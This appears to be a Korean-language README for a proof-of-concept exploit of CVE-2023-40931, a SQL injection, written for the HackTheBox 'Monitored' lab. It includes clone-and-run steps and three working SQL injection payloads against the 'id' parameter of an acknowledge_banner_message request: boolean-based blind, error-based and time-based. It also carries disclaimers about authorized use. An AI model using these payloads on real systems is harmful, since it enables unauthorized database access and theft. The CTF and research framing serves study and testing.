
CVE-2023-40931 개념 증명 — HTB MONITORED용
이 저장소는 CVE-2023-40931의 개념 증명(PoC)을 포함합니다. 이 저장소의 목적은 교육 및 연구 목적으로만 취약점을 시연하는 것입니다. 🛠️
이 프로젝트는 교육 목적 및 승인된 테스트만을 위한 것입니다. 이 코드를 오용하면 법적 결과가 발생할 수 있습니다. 작성자는 이 코드의 오용이나 손해에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 승인을 받으십시오. 🔒
자세한 내용은 공식 CVE 항목을 참조하십시오: CVE-2023-40931. 🔗
저장소를 클론합니다:
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
POST 매개변수 'id'가 취약합니다. 다음 페이로드가 취약점을 성공적으로 악용했습니다:
Boolean 기반 블라인드: 이 페이로드는 조건문을 활용하여 쿼리의 참/거짓 값을 판별하고, 부울 논리를 통해 데이터를 추출합니다.
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))Error 기반: 이 페이로드는 특정 오류를 트리거하여 데이터베이스 오류 메시지를 통해 정보를 추출합니다.
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Time 기반 블라인드: 이 페이로드는 시간 지연을 이용하여 서버의 응답 시간을 관찰함으로써 정보를 유추합니다.
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)이러한 페이로드는 SQL 인젝션 공격에 대한 취약점을 보여줍니다. 주의하여 진행하고 테스트 전에 적절한 승인을 받으십시오. 🔒
exploit.py 파일의 지침에 따라 PoC를 실행합니다. 🧑💻
참고: 필요한 종속성이 설치되어 있는지 확인하십시오. ✅